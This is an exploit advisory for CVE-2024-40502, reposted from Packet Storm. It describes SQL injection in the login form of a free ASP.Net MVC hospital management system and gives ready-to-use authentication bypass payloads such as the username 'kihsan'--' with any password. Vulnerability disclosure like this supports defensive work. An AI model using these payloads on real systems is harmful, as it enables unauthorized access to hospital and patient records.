Hospital Management System Project In ASP.Net MVC 1 SQL Injection
2024-7-18 01:26:21 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏

# Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL
Injection / Authentication Bypass
# Date: 07/16/2024
# Exploit Author: 0xMykull
# Vendor Hompage:
https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/
# Software Link:
https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/
# Version: 1
# CVE: CVE-2024-40502

Description:
An SQL injection vulnerability has been discovered in the btn_login_b_Click
function of the affected web application. The vulnerability exists due to
the improper sanitization of user-supplied input in the login form.
Specifically, the txt_login_username.Text and txt_login_pass.Text fields
are concatenated directly into an SQL query string without proper
parameterization or escaping.

Endpoint: https://localhost:44306/Users/Loginpage.aspx

Bypass Payloads:

(default user)
Username: kihsan'--
password: <anything>

Username: <anyvaliduser>'--
password: <anything>


文章来源: https://packetstormsecurity.com/files/179583/hmsp1-sql.txt
如有侵权请联系:admin#unsafe.sh